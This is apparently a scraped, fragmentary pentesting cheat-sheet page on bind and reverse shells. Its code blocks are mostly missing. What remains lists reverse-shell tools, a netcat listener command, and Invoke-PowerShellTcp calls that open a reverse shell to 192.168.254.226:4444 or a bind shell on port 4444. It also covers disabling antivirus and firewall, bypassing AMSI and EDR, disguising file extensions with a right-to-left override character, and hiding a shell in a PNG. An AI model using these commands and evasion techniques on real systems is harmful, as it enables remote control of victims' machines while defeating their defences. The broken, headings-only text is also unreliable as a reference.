Bind and Reverse Shell
Tools
Online
LazyRevShell

One-Lin3r

FuegoShell
Web Shells
Web ShellReverse Shell - Not Web
revshell.sh - Test all methods
rs-shell - RS in Rust
Secure Reverse Shell
Reverse shell tool that uses AES-GCM (256-bit) encryption and ECDH (Curve P-256) to ensure encrypted and protected communication
FullBypass
Bypass AMSI
rcat
PowerJoker - Powershell Reverse Shell - Bypass Defender
Over UDP
Attack Host
nc -nlvp 1234
Netcat - Victim
Netcat traditional
Socat - Victim
Encrypted
Bash - Victim
Python - Victim
Powershell - Victim
Also Check PowerJocker and FuegoShell
If:
=> Disable AV
Disable / Remove AV Defender and FirewallInvoke-PowershellTcp.ps1
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
DLL
MSFVenom
Linux
Windows
Cheatsheet:
More on: https://www.revshells.com/
MetasploitBypass AV / EDR
Curl
Bind Shell - Not Web
Netcat -Victim
Encrypted shell
Socat - Vicitim
Bash - Victim
Debugging
Python - Victim
Powershell - Vicitm
Invoke-PowershellTcp.ps1
PS > Invoke-PowerShellTcp -Bind -Port 4444
Attack Host
Right to left override - Masquerading
Takes a file (usually executable) and appends a Unicode right to left override character to disguise the real file extension
Shell inside a PNG
TTY upgrade
TTY UpgradeResources
Last updated


